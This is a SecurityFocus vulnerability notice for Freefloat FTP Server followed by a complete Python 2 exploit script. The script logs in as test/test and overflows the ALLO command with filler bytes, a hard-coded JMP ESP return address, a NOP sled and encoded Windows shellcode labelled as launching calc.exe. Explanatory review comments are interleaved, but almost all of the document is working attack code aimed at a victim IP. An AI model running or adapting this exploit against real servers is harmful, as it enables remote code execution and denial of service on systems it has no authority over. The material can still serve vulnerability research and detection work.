source: https://www.securityfocus.com/bid/49265/info
Freefloat FTP Server is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
import socket
import sys
def usage():
    """Print the command-line synopsis and one example invocation.

    Called only from the argument check below; it does not exit by itself
    (the caller does). Python 2 print statements, like the rest of the file.
    """
    print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
    print "example: ./freefloatftp.py 192.168.1.100 21"
# One TCP socket serves the whole exchange. It is created before the argument
# check, so a usage error exits with the socket still open (harmless for a
# one-shot script, but note the ordering).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n"
print "#############################################################################"
print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #"
print "#############################################################################"
print "\n"
# Exactly two positional arguments are expected: target host and FTP port.
# Anything else prints the synopsis and exits with status 0.
if len(sys.argv) != 3:
    usage()
    sys.exit()
ip = sys.argv[1]
# Kept as a string here; it is converted with int() only at connect time, so a
# non-numeric port is not rejected until the connection attempt.
port = sys.argv[2]
# Payload layout, in the order it is written to the wire:
#   junk1 | ret | nop | shellcode
# Every size and the address below are fixed constants for the build the
# author tested against; nothing is derived at runtime.
junk1= "\x41" * 246  # 246 filler bytes; presumably pad up to the saved return address (offset is not justified on this page)
ret = "\xED\x1E\x94\x7C" #7C941EED JMP ESP
# ^ little-endian 0x7C941EED, which the author labels as a JMP ESP instruction.
#   A hard-coded absolute address only works when the module is loaded at a
#   fixed base (no ASLR); DEP would also block execution of the stack-resident
#   sled and shellcode that follow.
nop = "\x90"* 200  # 200-byte NOP sled ahead of the shellcode
# windows/exec CMD=calc.exe
# Opaque payload bytes reproduced verbatim; the author's label above is the
# only description of them available here.
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
            "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
            "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
            "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
            "\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
            "\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
            "\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
            "\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
            "\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
            "\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
            "\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
            "\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
            "\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
            "\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
            "\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
            "\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
            "\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
            "\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
            "\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
            "\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
            "\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
            "\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
            "\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
            "\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
            "\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
            "\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
            "\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
            "\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
            "\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
            "\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
            "\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
            "\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
            "\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
            "\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
            "\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
            "\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
            "\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")
# The complete ALLO argument. RFC 959 defines ALLO's parameter as a decimal
# byte count, so an argument of this length and content is an easy anomaly to
# match in server-side logging or a network IDS rule.
buff = junk1 + ret + nop + shellcode
try:
    # print(...) here is still the Python 2 print statement applied to a
    # parenthesized expression, so it behaves like the prints above.
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip,int(port)))
    # Server banner; the value is read but never inspected.
    data = s.recv(1024)
    print("[-] Sending exploit...")
    # Login as test/test. Each reply is consumed but not checked, so a
    # rejected login does not stop the script; whether the server requires a
    # successful login before ALLO is not shown on this page.
    s.send("USER test\r\n")
    s.recv(1024)
    s.send("PASS test\r\n")
    s.recv(1024)
    # The trigger: ALLO with the oversized argument built above. No reply is
    # read afterwards, so "successfully sent" only means the bytes left this
    # socket, not that anything happened on the server.
    s.send("ALLO "+buff+"\r\n")
    s.close()
    print("[-] Exploit successfully sent...")
except:
    # NOTE(review): a bare except also catches ValueError from int(port),
    # KeyboardInterrupt and SystemExit, so every failure is reported as a
    # connection error, and the socket is left open on this path.
    print("[-] Connection error...")
    print("[-] Check if victim is up.")